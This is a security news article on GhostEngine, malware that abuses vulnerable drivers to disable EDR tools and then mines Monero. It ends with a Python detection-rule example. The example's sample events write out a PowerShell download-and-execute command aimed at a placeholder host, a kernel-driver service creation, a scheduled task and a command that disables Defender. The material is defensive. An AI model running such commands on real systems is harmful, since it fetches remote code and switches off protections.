CyberSecurity SEE

Novel EDR-Killing GhostEngine Malware is Designed for Stealth

A new strain of malware has emerged that abuses vulnerable drivers to terminate and evade endpoint detection and response (EDR) solutions. It is currently being used in an elaborate cryptomining campaign, shedding light on the increasingly sophisticated tactics employed by cybercriminals.

According to researchers at Elastic Security Labs, this malware, identified as GhostEngine, is part of an intrusion set named REF4578. The attackers behind this campaign have demonstrated a high level of complexity in their methods, using GhostEngine to disable EDR solutions, establish persistence, install a previously undocumented backdoor, and execute a cryptominer. The ultimate goal of this campaign is to breach security barriers within corporate networks and mine cryptocurrency without detection.

Simultaneously, the team at Antiy Labs has also observed these attacks, referring to the payload as “Hidden Shovel,” a mining Trojan that employs a two-stage approach to disable EDR solutions and install a backdoor. Both research teams have highlighted the use of the legitimate miner XMRig in these attacks, specifically for mining the cryptocurrency Monero.

The attack vector employed by GhostEngine involves the execution of a malicious PE file named Tiworker.exe, which masquerades as a legitimate Windows file. This file downloads and executes a PowerShell script that orchestrates the entire intrusion process, fetching attacker tools, GhostEngine modules, and configurations from a command-and-control server. Subsequently, GhostEngine downloads and executes its attack modules, which include tasks such as eliminating remnants of previous infections, disabling Windows Defender, and cleaning event log channels.

One of the most notable features of GhostEngine is its ability to terminate EDR processes, download and install a cryptominer, and establish a backdoor for remote command execution on infected systems. The malware is sophisticated, written in C++, and includes redundancy in its operation to avoid detection. Researchers were able to extract the configuration file from the XMRig miner, providing valuable insights into the mining operation conducted by the attackers.

To detect GhostEngine and similar malware, organizations are advised to prioritize monitoring for suspicious PowerShell executions, execution from unusual directories, privilege escalation, and the deployment of vulnerable drivers. Detection opportunities diminish significantly once a vulnerable driver is loaded, so organizations should actively hunt for already compromised endpoints rather than wait for alerts.

Behavioral indicators associated with the campaign include suspicious PowerShell downloads, service control initiated via a script interpreter, creation of local scheduled tasks, and tampering with Windows Defender. By monitoring network traffic for DNS record lookups and identifying traffic to known mining pool domains over specific ports, organizations can enhance their detection capabilities.
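The behavioral indicators listed above can be turned into simple host-telemetry rules. The following is an added example, not code from the original article or from either research team: it runs a handful of rules (PowerShell download cradles, service control spawned by a script interpreter, kernel-driver service registration, scheduled task creation, Defender tampering) over constructed process-creation events. The event tuples, the `placeholder.invalid` URL and the file paths are all made up for illustration.

```python
import re

# Constructed sample process-creation events: (parent image, image, command line).
# Illustrative only; not telemetry from the GhostEngine campaign.
SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe",
     "powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/get.php')\""),
    ("powershell.exe", "sc.exe", "sc create placeholder type= kernel binPath= C:\\Windows\\Temp\\placeholder.sys"),
    ("powershell.exe", "schtasks.exe", "schtasks /create /tn Updater /tr C:\\Windows\\Temp\\Tiworker.exe /sc onlogon"),
    ("cmd.exe", "powershell.exe", "powershell Set-MpPreference -DisableRealtimeMonitoring $true"),
    ("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),     # benign
    ("explorer.exe", "powershell.exe", "powershell Get-Process"),   # benign
]

SCRIPT_INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Each rule: (name, allowed parents or None, allowed images or None, command-line regex or None).
RULES = [
    ("suspicious_powershell_download", None, POWERSHELL,
     re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)),
    ("service_control_from_script_interpreter", SCRIPT_INTERPRETERS, {"sc.exe"}, None),
    ("kernel_driver_service_creation", None, {"sc.exe"}, re.compile(r"\bcreate\b.*type=\s*kernel", re.I)),
    ("scheduled_task_creation", None, {"schtasks.exe"}, re.compile(r"/create", re.I)),
    ("defender_tampering", None, POWERSHELL,
     re.compile(r"Set-MpPreference\s+-Disable|Add-MpPreference\s+-Exclusion", re.I)),
]


def evaluate(event):
    """Return the names of every rule that matches one (parent, image, cmdline) event."""
    parent, image, cmdline = event
    hits = []
    for name, parents, images, pattern in RULES:
        if parents is not None and parent.lower() not in parents:
            continue
        if images is not None and image.lower() not in images:
            continue
        if pattern is not None and not pattern.search(cmdline):
            continue
        hits.append(name)
    return hits


def scan(events):
    """Return {rule_name: number of matching events} for a batch of events."""
    counts = {}
    for event in events:
        for name in evaluate(event):
            counts[name] = counts.get(name, 0) + 1
    return counts
```

A single hit (a scheduled task, say) is weak on its own; several of these rules firing on one host within a short window is the pattern worth escalating.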

Overall, the emergence of GhostEngine highlights the need for proactive measures to defend against sophisticated malware attacks. By remaining vigilant and implementing comprehensive cybersecurity measures, organizations can better protect their networks from increasingly advanced threats.
